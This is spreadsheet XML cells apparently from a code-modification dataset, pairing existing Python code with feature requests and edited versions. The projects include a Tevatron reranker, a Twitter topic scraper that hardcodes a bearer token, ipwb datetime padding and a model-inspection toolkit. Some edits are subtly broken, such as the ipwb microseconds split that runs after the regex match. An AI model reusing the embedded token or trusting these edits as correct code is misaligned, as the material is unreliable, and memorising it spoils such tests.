    <t>{'#file 1': 'class ICLight:\n    def extra_conds(self, **kwargs):\n        out = {}\n        \n        image = kwargs.get("concat_latent_image", None)\n        noise = kwargs.get("noise", None)\n        device = kwargs["device"]\n        strength = kwargs.get("strength", 1.0)  #Modify\n\n        model_in_channels = self.model_config.unet_config[\'in_channels\']\n        input_channels = image.shape[1] + 4\n\n        if model_in_channels != input_channels:\n            raise Exception(f"Input channels {input_channels} does not match model in_channels {model_in_channels}, \'opt_background\' latent input should be used with the IC-Light \'fbc\' model, and only with it")\n        \n        if image is None:\n            image = torch.zeros_like(noise)\n\n        if image.shape[1:] != noise.shape[1:]:\n            image = comfy.utils.common_upscale(image.to(device), noise.shape[-1], noise.shape[-2], "bilinear", "center")\n\n        image = comfy.utils.resize_to_batch_size(image, noise.shape[0])\n        image = image * strength  #Modify\n\n        process_image_in = lambda image: image\n        out[\'c_concat\'] = comfy.conds.CONDNoiseShape(process_image_in(image))\n        \n        adm = self.encode_adm(**kwargs)\n        if adm is not None:\n            out[\'y\'] = comfy.conds.CONDRegular(adm)\n        return out', '#file 2': 'def bound_extra_conds(self, **kwargs):\n    strength = kwargs.get("strength", 1.0)  #New\n    kwargs["strength"] = strength  #New\n    return ICLight.extra_conds(self, **kwargs)\nnew_extra_conds = types.MethodType(bound_extra_conds, model_clone.model)\nmodel_clone.add_object_patch("extra_conds", new_extra_conds)'}</t>
  </si>
  <si>
    <t>{'called_code_segment': "class RerankerInferenceDataset(Dataset):\n    def __init__(self, data_args: DataArguments):\n        self.data_args = data_args\n        self.inference_data = load_dataset(\n            self.data_args.dataset_name,\n            self.data_args.dataset_config,\n            data_files=self.data_args.dataset_path,\n            split=self.data_args.dataset_split,\n            cache_dir=self.data_args.dataset_cache_dir,\n        )\n        if self.data_args.dataset_number_of_shards &gt; 1:\n            self.inference_data = self.inference_data.shard(\n                num_shards=self.data_args.dataset_number_of_shards,\n                index=self.data_args.dataset_shard_index,\n            )\n\n    def __len__(self):\n        return len(self.inference_data)\n\n    def __getitem__(self, item) -&gt; Tuple[str, str]:\n        example = self.inference_data[item]\n        query_id = example['query_id']\n        query = example['query']\n        text_id = example['docid']\n        text = example['text']\n        title = example['title']\n        return query_id, text_id, format_pair(query, text, title, self.data_args.query_prefix, self.data_args.passage_prefix)", 'invoking_code_segment': 'rerank_dataset = RerankerInferenceDataset(data_args=data_args)\n    rerank_collator = RerankerInferenceCollator(data_args=data_args, tokenizer=tokenizer)\n\n    rerank_loader = DataLoader(\n        rerank_dataset,\n        batch_size=training_args.per_device_eval_batch_size,\n        collate_fn=rerank_collator,\n        shuffle=False,\n        drop_last=False,\n        num_workers=training_args.dataloader_num_workers,\n    )', 'feature_description': 'Add support for dynamic query prefix and passage prefix during inference. This allows users to override the default query and passage prefixes from data_args with custom values at inference time, providing flexibility in how queries and passages are formatted without modifying the configuration files.', 'modified_complete_code': '# File 1: tevatron/src/tevatron/reranker/dataset.py\nimport random\nfrom typing import List, Tuple, Optional\n\nfrom datasets import load_dataset\nfrom torch.utils.data import Dataset\n\nfrom tevatron.reranker.arguments import DataArguments\n\nimport logging\nlogger = logging.getLogger(__name__)\n\n\ndef format_pair(query: str, passage: str, title: str, query_prefix: str, passage_prefix: str):\n    title = title.replace(\'-\', \' \').strip()\n    return f\'{query_prefix} {query} {passage_prefix} {title} {passage}\'.strip()\n\n\nclass RerankerTrainDataset(Dataset):\n    def __init__(self, data_args: DataArguments, trainer = None):\n        self.data_args = data_args\n        self.train_data = load_dataset(\n            self.data_args.dataset_name,\n            self.data_args.dataset_config,\n            data_files=self.data_args.dataset_path,\n            split=self.data_args.dataset_split,\n            cache_dir=self.data_args.dataset_cache_dir,\n        )\n        if self.data_args.dataset_number_of_shards &gt; 1:\n            self.encode_data = self.encode_data.shard(\n                num_shards=self.data_args.dataset_number_of_shards,\n                index=self.data_args.dataset_shard_index,\n            )\n        self.trainer = trainer\n\n    def __len__(self):\n        return len(self.train_data)\n\n    def __getitem__(self, item) -&gt; Tuple[str, List[str]]:\n        group = self.train_data[item]\n        epoch = int(self.trainer.state.epoch)\n\n        _hashed_seed = hash(item + self.trainer.args.seed)\n\n        query = group[\'query\']\n        group_positives = group[\'positive_passages\']\n        group_negatives = group[\'negative_passages\']\n\n        formated_pair = []\n\n        if self.data_args.positive_passage_no_shuffle:\n            pos_psg = group_positives[0]\n        else:\n            pos_psg = group_positives[(_hashed_seed + epoch) % len(group_positives)]\n        \n        formated_pair.append(format_pair(query, pos_psg[\'text\'], pos_psg[\'title\'], self.data_args.query_prefix, self.data_args.passage_prefix))\n\n        negative_size = self.data_args.train_group_size - 1\n        if len(group_negatives) &lt; negative_size:\n            negs = random.choices(group_negatives, k=negative_size)\n        elif self.data_args.train_group_size == 1:\n            negs = []\n        elif self.data_args.negative_passage_no_shuffle:\n            negs = group_negatives[:negative_size]\n        else:\n            _offset = epoch * negative_size % len(group_negatives)\n            negs = [x for x in group_negatives]\n            random.Random(_hashed_seed).shuffle(negs)\n            negs = negs * 2\n            negs = negs[_offset: _offset + negative_size]\n\n        for neg_psg in negs:\n            formated_pair.append(format_pair(query, neg_psg[\'text\'], neg_psg[\'title\'], self.data_args.query_prefix, self.data_args.passage_prefix))\n\n        return formated_pair\n\n\nclass RerankerInferenceDataset(Dataset):\n    #Modify: Added optional parameters for dynamic prefix override\n    def __init__(self, data_args: DataArguments, query_prefix: Optional[str] = None, passage_prefix: Optional[str] = None):\n        self.data_args = data_args\n        #New: Store dynamic prefixes, fallback to data_args if not provided\n        self.query_prefix = query_prefix if query_prefix is not None else data_args.query_prefix\n        self.passage_prefix = passage_prefix if passage_prefix is not None else data_args.passage_prefix\n        \n        self.inference_data = load_dataset(\n            self.data_args.dataset_name,\n            self.data_args.dataset_config,\n            data_files=self.data_args.dataset_path,\n            split=self.data_args.dataset_split,\n            cache_dir=self.data_args.dataset_cache_dir,\n        )\n        if self.data_args.dataset_number_of_shards &gt; 1:\n            self.inference_data = self.inference_data.shard(\n                num_shards=self.data_args.dataset_number_of_shards,\n                index=self.data_args.dataset_shard_index,\n            )\n\n    def __len__(self):\n        return len(self.inference_data)\n\n    def __getitem__(self, item) -&gt; Tuple[str, str]:\n        example = self.inference_data[item]\n        query_id = example[\'query_id\']\n        query = example[\'query\']\n        text_id = example[\'docid\']\n        text = example[\'text\']\n        title = example[\'title\']\n        #Modify: Use instance prefixes instead of data_args prefixes\n        return query_id, text_id, format_pair(query, text, title, self.query_prefix, self.passage_prefix)\n\n\n# File 2: tevatron/src/tevatron/reranker/driver/rerank.py\nimport logging\nimport os\nimport sys\nfrom contextlib import nullcontext\n\nfrom tqdm import tqdm\n\nimport torch\n\nfrom torch.utils.data import DataLoader\nfrom transformers import AutoTokenizer\nfrom transformers import (\n    HfArgumentParser,\n)\nfrom transformers import TrainingArguments\nfrom tevatron.reranker.arguments import ModelArguments, DataArguments\n\nfrom tevatron.reranker.dataset import RerankerInferenceDataset\nfrom tevatron.reranker.modeling import RerankerModel\nfrom tevatron.reranker.collator import RerankerInferenceCollator\n\nlogger = logging.getLogger(__name__)\n\n\ndef main():\n    parser = HfArgumentParser((ModelArguments, DataArguments, TrainingArguments))\n    if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):\n        model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))\n    else:\n        model_args, data_args, training_args = parser.parse_args_into_dataclasses()\n        model_args: ModelArguments\n        data_args: DataArguments\n        training_args: TrainingArguments\n\n    if training_args.local_rank &gt; 0 or training_args.n_gpu &gt; 1:\n        raise NotImplementedError(\'Multi-GPU encoding is not supported.\')\n\n    # Setup logging\n    logging.basicConfig(\n        format="%(asctime)s - %(levelname)s - %(name)s -   %(message)s",\n        datefmt="%m/%d/%Y %H:%M:%S",\n        level=logging.INFO if training_args.local_rank in [-1, 0] else logging.WARN,\n    )\n\n    tokenizer = AutoTokenizer.from_pretrained(\n        model_args.tokenizer_name if model_args.tokenizer_name else model_args.model_name_or_path,\n        cache_dir=model_args.cache_dir\n    )\n    if tokenizer.pad_token_id is None:\n        tokenizer.pad_token_id = 0\n    tokenizer.padding_side = \'right\'\n\n    model = RerankerModel.load(\n        model_args.model_name_or_path,\n        lora_name_or_path=model_args.lora_name_or_path,\n        cache_dir=model_args.cache_dir,\n    )\n\n    #Modify: Added optional dynamic prefix parameters\n    #New: Extract custom prefixes from environment variables or use defaults\n    custom_query_prefix = os.getenv(\'RERANK_QUERY_PREFIX\', None)\n    custom_passage_prefix = os.getenv(\'RERANK_PASSAGE_PREFIX\', None)\n    \n    rerank_dataset = RerankerInferenceDataset(\n        data_args=data_args,\n        query_prefix=custom_query_prefix,\n        passage_prefix=custom_passage_prefix\n    )\n    rerank_collator = RerankerInferenceCollator(data_args=data_args, tokenizer=tokenizer)\n\n    rerank_loader = DataLoader(\n        rerank_dataset,\n        batch_size=training_args.per_device_eval_batch_size,\n        collate_fn=rerank_collator,\n        shuffle=False,\n        drop_last=False,\n        num_workers=training_args.dataloader_num_workers,\n    )\n    model = model.to(training_args.device)\n    model.eval()\n    all_results = {}\n\n    for (batch_query_ids, batch_text_ids, batch) in tqdm(rerank_loader):\n        with torch.cuda.amp.autocast() if training_args.fp16 else nullcontext():\n            with torch.no_grad():\n                for k, v in batch.items():\n                    batch[k] = v.to(training_args.device)\n                model_output = model(batch)\n                scores = model_output.scores.cpu().detach().float().numpy()\n                for i in range(len(scores)):\n                    qid = batch_query_ids[i]\n                    docid = batch_text_ids[i]\n                    score = scores[i][0]\n                    if qid not in all_results:\n                        all_results[qid] = []\n                    all_results[qid].append((docid, score))\n\n    with open(data_args.rerank_output_path, \'w\') as f:\n        for qid in all_results:\n            results = sorted(all_results[qid], key=lambda x: x[1], reverse=True)\n            for docid, score in results:\n                f.write(f\'{qid}\\t{docid}\\t{score}\\n\')\n\nif __name__ == "__main__":\n    main()'}</t>
  </si>
  <si>
    <t>{'file1': "class RerankerInferenceDataset(Dataset):\n\n    def __init__(self, data_args: DataArguments, query_prefix: str, passage_prefix: str):\n        self.data_args = data_args\n        self.query_prefix = query_prefix\n        self.passage_prefix = passage_prefix\n        self.inference_data = load_dataset(\n            self.data_args.dataset_name,\n            self.data_args.dataset_config,\n            data_files=self.data_args.dataset_path,\n            split=self.data_args.dataset_split,\n            cache_dir=self.data_args.dataset_cache_dir,\n        )\n        if self.data_args.dataset_number_of_shards &gt; 1:\n            self.inference_data = self.inference_data.shard(\n                num_shards=self.data_args.dataset_number_of_shards,\n                index=self.data_args.dataset_shard_index,\n            )\n\n    def __len__(self):\n        return len(self.inference_data)\n\n    def __getitem__(self, item) -&gt; Tuple[str, str]:\n        example = self.inference_data[item]\n        query_id = example['query_id']\n        query = example['query']\n        text_id = example['docid']\n        text = example['text']\n        title = example['title']\n        return query_id, text_id, format_pair(query, text, title, self.query_prefix, self.passage_prefix)  #Modify", 'file2': 'from tevatron.reranker.dataset import RerankerInferenceDataset\n\n# ...\n\nrerank_dataset = RerankerInferenceDataset(\n    data_args=data_args,\n    query_prefix=data_args.query_prefix,\n    passage_prefix=data_args.passage_prefix\n)  #Modify\nrerank_collator = RerankerInferenceCollator(data_args=data_args, tokenizer=tokenizer)\n\nrerank_loader = DataLoader(\n    rerank_dataset,\n    batch_size=training_args.per_device_eval_batch_size,\n    collate_fn=rerank_collator,\n    shuffle=False,\n    drop_last=False,\n    num_workers=training_args.dataloader_num_workers,\n)\n\n# ...\n\nfor (batch_query_ids, batch_text_ids, batch) in tqdm(rerank_loader):'}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def scrape(self) method in Topic_api class, specifically the Scraping_utilities.make_http_request_with_params() call within the while loop', 'invoking_code_segment': 'scrape_topic_with_api() function which instantiates Topic_api and calls topic_api_scraper.scrape()', 'feature_description': 'Add a retry mechanism for failed HTTP requests during scraping with configurable retry attempts and exponential backoff delay between retries', 'modified_complete_code': '#!/usr/bin/env python3\n\nfrom .driver_initialization import Initializer\nfrom .element_finder import Finder\nimport logging\nfrom .scraping_utilities import Scraping_utilities\nimport json\nfrom typing import Union\nimport os\nimport time\n\nlogger = logging.getLogger(__name__)\nformat = logging.Formatter(\n    "%(asctime)s - %(levelname)s - %(message)s")\nch = logging.StreamHandler()\nch.setFormatter(format)\nlogger.addHandler(ch)\n\n\nclass Topic_api:\n    def __init__(self, URL, browser, proxy, headless, tweets_count, max_retries=3, retry_delay=2):\n        self.URL = URL\n        self.browser = browser\n        self.proxy = proxy\n        self.headless = headless\n        self.driver = \'\'\n        self.data_dict = {}\n        self.tweets_count = tweets_count\n        #New: Add retry configuration parameters\n        self.max_retries = max_retries\n        self.retry_delay = retry_delay\n\n    def start_driver(self):\n        """changes the class member driver value to driver on call"""\n        self.driver = Initializer(\n            self.browser, self.headless, self.proxy).init()\n\n    def close_driver(self):\n        self.driver.close()\n        self.driver.quit()\n\n    def generate_graphql_link(self, key):\n        return \'https://twitter.com/i/api/graphql/{}/TopicLandingPage\'.format(key)\n\n    def find_rest_id(self):\n        return self.URL.split(\'topics/\')[-1]\n\n    def augment_data(self, data):\n        try:\n            for tweet in data:\n                try:\n                    typename = tweet[\'content\'][\'itemContent\'][\'tweet_results\'][\'result\'][\'__typename\']\n                except KeyError:\n                    continue\n                if typename.lower() == \'tweet\':\n                    result = tweet[\'content\'][\'itemContent\'][\'tweet_results\'][\'result\']\n                    key = result[\'rest_id\']\n                    user = result[\'core\'][\'user_results\'][\'result\'][\'legacy\']\n                    tweet_data = result[\'legacy\']\n                    self.data_dict[key] = {\n                        \'tweet_url\': "https://twitter.com/{}/status/{}".format(user[\'screen_name\'], key),\n                        \'tweet_detail\': tweet_data,\n                        \'user_details\': user\n                    }\n        except Exception as ex:\n            logger.exception(\'Error at augment_data : {}\'.format(ex))\n\n    def find_entries(self, instructions):\n        entries = []\n        for item in instructions:\n            if item[\'type\'] == \'TimelineAddEntries\':\n                entries = item[\'entries\']\n                break\n        return entries\n\n    def find_cursor(self, entries):\n        try:\n            cursor = None\n            for entry in entries:\n                if entry[\'content\'][\'entryType\'] == \'TimelineTimelineCursor\':\n                    if entry[\'content\'][\'cursorType\'] == \'Bottom\':\n                        cursor = entry[\'content\'][\'value\']\n                        break\n            return cursor\n        except Exception as ex:\n            logger.exception(\'Error at find_cursor : {}\'.format(ex))\n\n    #New: Add retry mechanism method\n    def make_request_with_retry(self, graphql_link, params, headers):\n        """Make HTTP request with retry mechanism and exponential backoff.\n        \n        Args:\n            graphql_link (str): The GraphQL endpoint URL\n            params (dict): Request parameters\n            headers (dict): Request headers\n            \n        Returns:\n            dict or None: Response data if successful, None otherwise\n        """\n        for attempt in range(self.max_retries):\n            try:\n                response = Scraping_utilities.make_http_request_with_params(\n                    graphql_link, params, headers, self.proxy)\n                if response:\n                    logger.info(\'HTTP request successful on attempt {}\'.format(attempt + 1))\n                    return response\n                else:\n                    logger.warning(\'HTTP request returned empty response on attempt {}\'.format(attempt + 1))\n            except Exception as ex:\n                logger.warning(\'HTTP request failed on attempt {}: {}\'.format(attempt + 1, ex))\n            \n            #New: Exponential backoff delay before retry\n            if attempt &lt; self.max_retries - 1:\n                delay = self.retry_delay * (2 ** attempt)\n                logger.info(\'Retrying in {} seconds...\'.format(delay))\n                time.sleep(delay)\n        \n        logger.error(\'Failed to make HTTP request after {} attempts\'.format(self.max_retries))\n        return None\n\n    def scrape(self):\n        try:\n            BEARER_TOKEN = \'Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA\'\n            self.start_driver()\n            key = Finder.find_graphql_key(self.driver, self.URL)\n            self.close_driver()\n            graphql_link = self.generate_graphql_link(key)\n            cursor = None\n            rest_id = self.find_rest_id()\n            guest_token = Scraping_utilities.find_x_guest_token(\n                BEARER_TOKEN, self.proxy)\n            while len(self.data_dict) &lt; self.tweets_count:\n                params = Scraping_utilities.build_topic_params(rest_id, cursor)\n                headers = Scraping_utilities.build_topic_headers(\n                    guest_token, BEARER_TOKEN, rest_id)\n                #Modify: Use retry mechanism instead of direct request\n                response = self.make_request_with_retry(graphql_link, params, headers)\n                if response:\n                    instructions = response[\'data\'][\'topic_by_rest_id\'][\'topic_page\'][\'body\'][\'timeline\'][\'instructions\']\n                    entries = self.find_entries(instructions)\n                    self.augment_data(entries)\n                    cursor = self.find_cursor(entries)\n                    logger.setLevel(logging.INFO)\n                    logger.info(\'Number of tweets scraped: {}\'.format(\n                        len(self.data_dict)))\n                else:\n                    logger.warning(\'Failed to make request after all retries!\')\n                    break\n\n            data = dict(list(self.data_dict.items())\n                        [0:int(self.tweets_count)])\n            return data\n        except Exception as ex:\n            logger.warning(\'Error at scrap : {}\'.format(ex))\n\n\ndef scrape_topic_with_api(URL: str, proxy: Union[str, None] = None,\n                          tweets_count: int = 10,\n                          output_filename: Union[str, None] = None,\n                          output_dir: Union[str, None] = os.getcwd(),\n                          browser: str = \'firefox\',\n                          headless: bool = True,\n                          max_retries: int = 3,\n                          retry_delay: int = 2):\n    """Function to scrape twitter Topic from URL using Twitter\'s API.\n\n    Args:\n        URL (str): URL of the topic.\n        proxy (Union[str, None], optional): Optional parameter, if user wants to use proxy for scraping. If the proxy is authenticated proxy then the proxy format is username:password@host:port. Defaults to None.\n        tweets_count (int, optional): Number of Tweets to scrape. Defaults to 10.\n        output_filename (Union[str, None], optional): Name of the output JSON file. Defaults to None.\n        output_dir (Union[str, None], optional): Directory where to save the file. Defaults to os.getcwd().\n        browser (str, optional): Which browser to use for extracting out graphql key. Defaults to \'firefox\'.\n        headless (bool, optional): Whether to run browser in headless mode?. Defaults to True.\n        max_retries (int, optional): Maximum number of retry attempts for failed requests. Defaults to 3.\n        retry_delay (int, optional): Initial delay in seconds between retries (uses exponential backoff). Defaults to 2.\n    Returns:\n        (dict | none): None if data was saved, else JSON String.\n    """\n    #Modify: Pass retry parameters to Topic_api constructor\n    topic_api_scraper = Topic_api(\n        URL=URL, browser=browser, tweets_count=tweets_count, proxy=proxy, headless=headless, max_retries=max_retries, retry_delay=retry_delay)\n    data = topic_api_scraper.scrape()\n    if output_filename and len(data) &gt; 0:\n        path = os.path.join(output_dir, "{}.json".format(output_filename))\n        mode = \'a\'\n        if os.path.exists(path):\n            mode = \'r\'\n        with open(path, mode, encoding=\'utf-8\') as file:\n            if mode == \'r\':\n                try:\n                    file_content = file.read()\n                    content = json.loads(file_content)\n                except json.decoder.JSONDecodeError:\n                    logger.warning(\'Invalid JSON Detected!\')\n                    content = {}\n                file.close()\n                data.update(content)\n        with open(path, \'w\', encoding=\'utf-8\') as file_in_write_mode:\n            json.dump(data, file_in_write_mode)\n            logger.setLevel(logging.INFO)\n            logger.info(\'Data was saved to {}\'.format(path))\n    else:\n        return data'}</t>
  </si>
  <si>
    <t>### File 1: topic_api.py
#Modify
def scrape(self):
    try:
        BEARER_TOKEN = 'Bearer AAAAAAAAAAAAAAAAAAAAANRILgAAAAAAnNwIzUejRCOuH5E6I8xnZz4puTs%3D1Zv7ttfk8LF81IUq16cHjhLTvJu4FA33AGWWjCpTnA'
        self.start_driver()
        key = Finder.find_graphql_key(self.driver, self.URL)
        self.close_driver()
        graphql_link = self.generate_graphql_link(key)
        cursor = None
        rest_id = self.find_rest_id()
        guest_token = Scraping_utilities.find_x_guest_token(
            BEARER_TOKEN, self.proxy)
        retry_count = 3  # New: Number of retries
        while len(self.data_dict) &lt; self.tweets_count:
            params = Scraping_utilities.build_topic_params(rest_id, cursor)
            headers = Scraping_utilities.build_topic_headers(
                guest_token, BEARER_TOKEN, rest_id)
            response = None
            for attempt in range(retry_count):
                response = Scraping_utilities.make_http_request_with_params(graphql_link,
                                                                            params, headers, self.proxy)
                if response:
                    break
                else:
                    logger.warning('Request failed, retrying... (Attempt {}/{})'.format(attempt + 1, retry_count))
            if response:
                instructions = response['data']['topic_by_rest_id']['topic_page']['body']['timeline']['instructions']
                entries = self.find_entries(instructions)
                self.augment_data(entries)
                cursor = self.find_cursor(entries)
                logger.setLevel(logging.INFO)
                logger.info('Number of tweets scraped: {}'.format(
                    len(self.data_dict)))
            else:
                logger.warning('Failed to make request after {} attempts!'.format(retry_count))
                break
        data = dict(list(self.data_dict.items())
                    [0:int(self.tweets_count)])
        return data
    except Exception as ex:
        logger.warning('Error at scrap : {}'.format(ex))
### File 2: __init__.py
#Modify
def scrape_topic_with_api(URL: str, proxy: Union[str, None] = None,
                          tweets_count: int = 10,
                          output_filename: Union[str, None] = None,
                          output_dir: Union[str, None] = os.getcwd(),
                          browser: str = 'firefox',
                          headless: bool = True):
    """Function to scrape twitter Topic from URL using Twitter's API.
    Args:
        URL (str): URL of the topic.
        proxy (Union[str, None], optional): Optional parameter, if user wants to use proxy for scraping. If the proxy is authenticated proxy then the proxy format is username:password@host:port. Defaults to None.
        tweets_count (int, optional): Number of Tweets to scrape. Defaults to 10.
        output_filename (Union[str, None], optional): Name of the output JSON file. Defaults to None.
        output_dir (Union[str, None], optional): Directory where to save the file. Defaults to os.getcwd().
        browser (str, optional): Which browser to use for extracting out graphql key. Defaults to 'firefox'.
        headless (bool, optional): Whether to run browser in headless mode?. Defaults to True.
    Returns:
        (dict | none): None if data was saved, else JSON String.
    """
    topic_api_scraper = Topic_api(
        URL=URL, browser=browser, tweets_count=tweets_count, proxy=proxy, headless=headless)
    data = topic_api_scraper.scrape()
    if output_filename and len(data) &gt; 0:
        path = os.path.join(output_dir, "{}.json".format(output_filename))
        mode = 'a'
        if os.path.exists(path):
            mode = 'r'
        with open(path, mode, encoding='utf-8') as file:
            if mode == 'r':
                try:
                    file_content = file.read()
                    content = json.loads(file_content)
                except json.decoder.JSONDecodeError:
                    logger.warning('Invalid JSON Detected!')
                    content = {}
                file.close()
                data.update(content)
        with open(path, 'w', encoding='utf-8') as file_in_write_mode:
            json.dump(data, file_in_write_mode)
            logger.setLevel(logging.INFO)
            logger.info('Data was saved to {}'.format(path))
    else:
        return data</t>
  </si>
  <si>
    <t>{'called_code_segment': "def pad_digits14(dtstr, validate=False):\n    '''Pad datetime to make a 14-digit string and optionally validate it'''\n    match = dt_pattern.match(dtstr)\n    if match:\n        Y = match.group(1)\n        m = match.group(2) or '01'\n        d = match.group(3) or '01'\n        H = match.group(4) or '00'\n        M = match.group(5) or '00'\n        S = match.group(6) or '00'\n        dtstr = f'{Y}{m}{d}{H}{M}{S}'\n    if validate:\n        datetime.datetime.strptime(dtstr, '%Y%m%d%H%M%S')\n    return dtstr", 'invoking_code_segment': "@pytest.mark.parametrize('expected,input', [\n    ('', ''),\n    ('foo', 'foo'),\n    ('18', '18'),\n    ('201l', '201l'),\n    ('2018010100000O', '2018010100000O'),\n    ('20181', '20181'),\n    ('20180001000000', '201800'),\n    ('20180132000000', '20180132'),\n    ('20180102260000', '2018010226'),\n    ('20181301000000', '20181301000000'),\n    ('20180932000000', '20180932000000'),\n    ('20180230000000', '20180230000000'),\n    ('20181126134257.123', '20181126134257.123'),\n    ('20180101000000', '2018'),\n    ('20181101000000', '201811'),\n    ('20181126000000', '20181126'),\n    ('20181126130000', '2018112613'),\n    ('20181126134200', '201811261342'),\n    ('20181126134257', '20181126134257'),\n])\ndef test_pad_digits14(expected, input):\n    assert expected == util.pad_digits14(input)", 'feature_description': "Add a feature to handle microseconds in the datetime string. The pad_digits14 function should preserve microseconds when present in the input datetime string (e.g., '20181126134257.123' should remain '20181126134257.123' instead of being truncated to 14 digits).", 'modified_complete_code': '# ipwb/ipwb/util.py - MODIFIED SECTION\n\n# #Modify - Update the regex pattern to capture microseconds\ndt_pattern = re.compile(r"^(\\d{4})(\\d{2})?(\\d{2})?(\\d{2})?(\\d{2})?(\\d{2})?(\\.(\\d+))?$")\n\n# #Modify - Updated function to handle microseconds\ndef pad_digits14(dtstr, validate=False):\n    \'\'\'Pad datetime to make a 14-digit string and optionally validate it\'\'\'\n    match = dt_pattern.match(dtstr)\n    if match:\n        Y = match.group(1)\n        m = match.group(2) or \'01\'\n        d = match.group(3) or \'01\'\n        H = match.group(4) or \'00\'\n        M = match.group(5) or \'00\'\n        S = match.group(6) or \'00\'\n        # #New - Extract microseconds if present\n        microseconds = match.group(8) if match.group(8) else \'\'\n        dtstr = f\'{Y}{m}{d}{H}{M}{S}\'\n        # #New - Append microseconds if they exist\n        if microseconds:\n            dtstr += f\'.{microseconds}\'\n    if validate:\n        # #Modify - Handle validation with optional microseconds\n        try:\n            datetime.datetime.strptime(dtstr.split(\'.\')[0], \'%Y%m%d%H%M%S\')\n        except ValueError:\n            raise ValueError(f\'Invalid datetime format: {dtstr}\')\n    return dtstr\n\n# ipwb/tests/test_util.py - TEST SECTION (already includes microseconds test case)\n# The existing test case (\'20181126134257.123\', \'20181126134257.123\') will now pass\n# with the updated pad_digits14 function that preserves microseconds'}</t>
  </si>
  <si>
    <t>{'ipwb/ipwb/util.py': "#Modify\ndef pad_digits14(dtstr, validate=False):\n    '''Pad datetime to make a 14-digit string and optionally validate it'''\n    match = dt_pattern.match(dtstr)\n    microseconds = ''\n    if ' ' in dtstr:\n        dtstr, microseconds = dtstr.split(' ', 1)\n    if match:\n        Y = match.group(1)\n        m = match.group(2) or '01'\n        d = match.group(3) or '01'\n        H = match.group(4) or '00'\n        M = match.group(5) or '00'\n        S = match.group(6) or '00'\n        dtstr = f'{Y}{m}{d}{H}{M}{S}'\n    if validate:\n        datetime.datetime.strptime(dtstr, '%Y%m%d%H%M%S')\n    return dtstr + microseconds", 'tests/test_util.py': "#Modify\ndef test_pad_digits14(expected, input):\n    assert expected == util.pad_digits14(input)\n\n#New\n@pytest.mark.parametrize('expected,input', [\n    ('20181126134257.123', '20181126134257.123'),\n])\ndef test_pad_digits14_with_microseconds(expected, input):\n    assert expected == util.pad_digits14(input)"}</t>
  </si>
  <si>
    <t>{'called_code_segment': 'def get_prefixed_keys(component):\n    prefix = COMPONENTS[component]["prefix"]\n    allowed = COMPONENTS[component]["keys"]\n    return set([(prefix + k, z) for k, z in allowed])', 'invoking_code_segment': 'def inspect_model(model, all=False):\n    # find all arch\'s and components in the model\n    # also reasons for failing to find them\n\n    keys = set([(k, tensor_shape(k, model[k])) for k in model])\n\n    rejected = {}\n\n    components = [] # comp -&gt; prefixed\n    classes = {} # class -&gt; [comp]\n    for comp in COMPONENTS:\n        required_keys_unprefixed = COMPONENTS[comp]["keys"]\n        required_keys_prefixed = get_prefixed_keys(comp)', 'feature_description': 'Add a feature to allow users to specify a custom prefix for components during analysis. This enables flexible component identification with user-defined prefixes instead of relying solely on predefined prefixes in the COMPONENTS dictionary.', 'modified_complete_code': '# File 1: toolkit.py - Modified functions\n\n#Modify\ndef get_prefixed_keys(component, custom_prefix=None):\n    prefix = custom_prefix if custom_prefix is not None else COMPONENTS[component]["prefix"]\n    allowed = COMPONENTS[component]["keys"]\n    return set([(prefix + k, z) for k, z in allowed])\n\n#Modify\ndef inspect_model(model, all=False, custom_prefixes=None):\n    # find all arch\'s and components in the model\n    # also reasons for failing to find them\n    # custom_prefixes: dict mapping component names to custom prefixes\n\n    keys = set([(k, tensor_shape(k, model[k])) for k in model])\n\n    rejected = {}\n    custom_prefixes = custom_prefixes or {}\n\n    components = [] # comp -&gt; prefixed\n    classes = {} # class -&gt; [comp]\n    for comp in COMPONENTS:\n        required_keys_unprefixed = COMPONENTS[comp]["keys"]\n        #Modify\n        required_keys_prefixed = get_prefixed_keys(comp, custom_prefixes.get(comp))\n        missing_unprefixed = required_keys_unprefixed.difference(keys)\n        missing_prefixed = required_keys_prefixed.difference(keys)\n\n        if not missing_unprefixed:\n            components += [(comp, False)]\n        if not missing_prefixed:\n            components += [(comp, True)]\n\n        if missing_prefixed and missing_unprefixed:\n            if missing_prefixed != required_keys_prefixed:\n                rejected[comp] = rejected.get(comp, []) + [{"reason": f"Missing required keys ({len(missing_prefixed)} of {len(required_keys_prefixed)})", "data": list(missing_prefixed)}]\n            \n            if missing_unprefixed != required_keys_unprefixed:\n                rejected[comp] = rejected.get(comp, []) + [{"reason": f"Missing required keys ({len(missing_unprefixed)} of {len(required_keys_unprefixed)})", "data": list(missing_unprefixed)}]\n        else:\n            clss = COMPONENT_CLASS[comp]\n            classes[clss] = [comp] + classes.get(clss, [])\n    \n    found = {} # arch -&gt; {class -&gt; [comp]}\n    for arch in ARCHITECTURES:\n        needs_prefix = ARCHITECTURES[arch]["prefixed"]\n        required_classes = set(ARCHITECTURES[arch]["classes"])\n        required_keys = set(ARCHITECTURES[arch]["required"])\n\n        if not required_keys.issubset(keys):\n            missing = required_keys.difference(keys)\n            if missing != required_keys:\n                rejected[arch] = rejected.get(arch, []) + [{"reason": f"Missing required keys ({len(missing)} of {len(required_keys)})", "data": list(missing)}]\n            continue\n\n        found_classes = {}\n        for clss in required_classes:\n            if clss in classes:\n                for comp in classes[clss]:\n                    if (comp, needs_prefix) in components:\n                        found_classes[clss] = found_classes.get(clss, [])\n                        found_classes[clss] += [comp]\n\n        found_class_names = set(found_classes.keys())\n        if not required_classes.issubset(found_class_names):\n            if found_class_names:\n                missing = list(required_classes.difference(found_class_names))\n                rejected[arch] = rejected.get(arch, []) + [{"reason": "Missing required classes", "data": missing}]\n            continue\n\n        found[arch] = found_classes\n\n    if any([a.startswith("SD-") for a in found]):\n        for a in list(found.keys()):\n            if a.endswith("-BROKEN"):\n                del found[a]\n    \n    for arch in list(found.keys()):\n        if "LoRA" in arch:\n            for clss in found[arch]:\n                if len(found[arch][clss]) == 2:\n                    found[arch][clss] = [found[arch][clss][0].replace("-v1-", "-v1A-")]\n    \n    if "LoRA-v1" in found:\n        del found["LoRA-v1-UNET"]\n        del found["LoRA-v1-CLIP"]\n\n    if all:\n        return found, rejected\n    else:\n 